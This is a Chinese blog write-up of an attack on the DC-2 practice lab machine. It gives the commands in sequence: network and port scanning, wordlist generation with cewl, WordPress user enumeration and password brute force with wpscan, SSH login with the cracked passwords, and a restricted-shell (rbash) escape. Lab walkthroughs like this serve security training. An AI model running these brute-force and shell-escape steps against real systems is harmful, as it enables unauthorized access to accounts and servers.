dc-2靶机渗透记录

1.扫描局域网所有设备

arp-scan -l

在这里插入图片描述
通过扫描找出靶机地址192.168.126.134
使用nmap扫描

nmap -sS -Pn -A -p- -n 192.168.126.134

在这里插入图片描述
这里发现开放的80端口,可以进行网页访问。
打开firefox进行访问
在这里插入图片描述
无法解析,在hosts文件添加对应的IP和域名

vim /etc/hosts

在这里插入图片描述
编辑好之后,输入:wq保存并退出
在这里插入图片描述
页面发现flag信息,找到flag1
在这里插入图片描述
在这里插入图片描述
根据提示搜索cewl,发现是一个kali自带的密码生成工具。
使用cewl生成密码

cewl -w dc2_passwords.txt http://dc-2 

在这里插入图片描述
使用wpscan工具扫描用户,暴力枚举用户名

wpscan --url http://dc-2 --enumerate u

扫描出三个用户名
在这里插入图片描述
admin,jerry和tom
写入dc-2_user.txt中
在这里插入图片描述
然后直接使用wpscan进行密码爆破

wpscan --ignore-main-redirect --url 192.168.126.134 -U dc-2_user.txt -P dc2_passwords.txt --force

在这里插入图片描述
可以看到,jerry和tom的密码被爆破成功
访问wordpress默认后台/wp-login.php,找到后台登录界面
在这里插入图片描述
这里我们使用爆破出的两个用户进行登录
登录tom用户,没有发现有用的信息
换成jerry来登录看看:
在这里插入图片描述在这里插入图片描述
发现了flag2。
使用tom用户进行登录ssh服务,密码parturient

ssh tom@192.168.126.134 -p 7744

在这里插入图片描述发现cat无法打开文件,多次尝试后发现vi可使用
在这里插入图片描述
意思应该是让我们切换用户。这里我们绕过rbash拿flag3
绕过rbash

BASH_CMDS[a]=/bin/sh;a
/bin/bash
添加环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

在这里插入图片描述
这里转成jerry账号
密码:adipiscing
在这里插入图片描述
然后就可以直接拿到flag4了
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值